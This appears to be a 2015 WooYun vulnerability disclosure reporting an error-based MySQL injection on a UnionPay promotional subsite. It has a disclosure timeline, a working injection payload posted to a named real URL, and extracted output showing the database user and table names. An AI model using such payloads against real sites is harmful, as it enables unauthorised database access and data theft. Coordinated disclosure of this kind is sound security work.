WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089927

漏洞标题：某大型支付机构所属另一子站MySQL报错注入

相关厂商：unionpay.com

漏洞作者： lijiejie

提交时间：2015-01-04 16:17

修复时间：2015-02-18 16:18

公开时间：2015-02-18 16:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2015-01-04： 细节已通知厂商并且等待厂商处理中
2015-01-09： 厂商已经确认，细节仅向厂商公开
2015-01-19： 细节向核心白帽子及相关领域专家公开
2015-01-29： 细节向普通白帽子公开
2015-02-08： 细节向实习白帽子公开
2015-02-18： 细节向公众公开

简要描述：

某大型支付机构所属另一子站MySQL报错注入

详细说明：

POST http://promo.unionpay.com/globalfiesta/index/showdetail/
id=1 and (select 1 from (select count(*), concat(floor(rand(0)*2), 0x5e5e5e,user()) x from information_schema.character_sets group by x)y)

漏洞证明：

db_ylgyb@localhost

Database: db_ylgyb
[5 tables]
+-------------+
| admin       |
| ci_sessions |
| hotels      |
| hotels_pic  |
| serieslist  |
+-------------+

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应